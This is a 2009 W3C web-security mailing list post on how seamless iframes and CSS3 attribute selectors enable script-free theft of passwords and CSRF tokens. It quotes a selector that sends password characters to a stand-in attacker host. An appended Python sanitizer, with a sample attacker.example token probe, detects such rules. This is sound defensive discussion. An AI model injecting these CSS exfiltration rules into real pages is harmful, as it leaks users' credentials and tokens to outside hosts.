
Re: Seamless iframes + CSS3 selectors = bad idea

From: Collin Jackson <w3c@collinjackson.com>
Date: Sat, 5 Dec 2009 10:05:25 -0800
Message-ID: <986207e70912051005p4b0d77a0xe856448aac75009@mail.gmail.com>
To: Adam Barth <w3c@adambarth.com>
Cc: sird@rckc.at, public-web-security@w3.org
A few thoughts:

* The password stealing attack can already be accomplished using the
iframe to create a login page and prompting the user to type their
password. It's not necessary to use CSS3 or seamless.
* If the password manager is used, CSS3 + seamless lets you steal the
password without user interaction.
* However, if you can inject arbitrary CSS3 and a seamless iframe into
a page, there's a good chance you can inject a password field, so this
password manager attack doesn't require seamless, just CSS3.
* Many webapps include a CSRF token in every page as a hidden form
field. If the page that allows CSS3 injection includes such a token,
you don't need seamless iframes to steal the token.

It seems like CSS3 is adding a lot of attack surface, so sites may need
to block arbitrary CSS3 injection regardless of seamless. That is
unfortunate since browser vendors have been removing expression,
-moz-binding, and other features that make CSS injection dangerous.

On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote:
> I see.  The issue is that the attacker can inject CSS + iframes, but
> not script, into one page in an origin.  Now with seamless+CSS3, the
> attacker can steal information from the entire origin.  Very cool!
> Adam
> On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote:
>> I sincerely understand why people want seamless iframes on HTML5.. I mean,
>> I've been there.. but sometimes the better way to do something is not to do
>> it.
>> The perfect example is seamless iframes (defined in html5) and CSS3
>> selectors.
>> I have (together with David Lindsay and Gareth Heyes) expressed
>> several times that we think this is a bad idea.
>> We always receive the same answer "seamless iframes are same-origin!" and
>> believe me, I know.. but guess what? javascript is also same origin.. and it
>> also creates problems.
>> What I see is that those awesome CSS3 selectors, such as:
>> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>> create a new type of XSS attack, and those are purely CSS based XSS
>> attacks.. without JS.. that will allow an attacker to read arbitrary files
>> from the page WITHOUT the need of JS.
>> I really hope people in here know that a cool feature is sometimes not such
>> a good idea, and hopefully, we can see how to resolve this issue..
>> References: The Sexy Assassin - BlueHat 2008 Presentation http://p42.us/css/
>> Favorite XSS - BlackHat 2009 Presentation http://p42.us/favxss/
>> Stefano Di Paola PoC http://www.wisec.it/CssSteal/frame.html
>> Greetings!!
>> -- Eduardo
>> http://www.sirdarckcat.net/
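As an added example (not part of the thread, and not code from any of its participants), here is a server-side check a site that accepts user-supplied CSS could run before serving it: it flags rules that pair a substring probe on an input's `value` attribute (`^=`, `$=`, `*=`) with a fetch from another host, which is exactly the per-character exfiltration pattern quoted above. The sample stylesheet is constructed for the example; the CSRF-token rule reflects the hidden-field case Collin mentions.

```python
import re

# Constructed sample: one benign rule, the selector quoted in the thread, and a
# constructed variant probing a hidden CSRF token field.
SAMPLE_CSS = """
.profile { color: #333; background: url("/static/bg.png"); }
input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
input[name="csrf_token"][value^="9f"] { background-image: url(https://attacker.example/t=9f) }
"""

# Attribute selector with a substring-style match: [attr^=..], [attr$=..], [attr*=..].
# An exact match ([type=password]) is not a probe and is deliberately not captured.
ATTR_PROBE = re.compile(r'\[\s*([\w-]+)\s*[\^\$\*]=\s*["\']?([^"\'\]]*)["\']?\s*\]')

# url() whose target is on another host (absolute or protocol-relative): the
# channel through which a matched selector leaks the probed characters.
EXTERNAL_URL = re.compile(r'url\(\s*["\']?((?:https?:)?//[^"\')\s]+)', re.IGNORECASE)


def split_rules(css):
    """Yield (selector, declaration block) pairs from a flat stylesheet.

    Nested @-rules are out of scope for this check; a real sanitizer would use
    a proper CSS parser."""
    for m in re.finditer(r'([^{}]+)\{([^{}]*)\}', css):
        yield m.group(1).strip(), m.group(2)


def find_exfil_rules(css):
    """Return one finding per rule that both probes a value attribute and
    fetches from an external host; each finding names the probed prefix and
    the remote URL so a reviewer can see what would have leaked where."""
    findings = []
    for selector, body in split_rules(css):
        remote = EXTERNAL_URL.findall(body)
        if not remote:
            continue  # no off-site fetch, so nothing can be exfiltrated
        for attr, prefix in ATTR_PROBE.findall(selector):
            if attr.lower() == "value":
                findings.append({"selector": selector, "probe": prefix, "remote": remote[0]})
    return findings


def is_safe_stylesheet(css):
    """True when no value-probe + external-fetch rule is present."""
    return not find_exfil_rules(css)


if __name__ == "__main__":
    for f in find_exfil_rules(SAMPLE_CSS):
        print(f"value prefix {f['probe']!r} would be sent to {f['remote']}")
```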
Received on Saturday, 5 December 2009 18:06:25 UTC
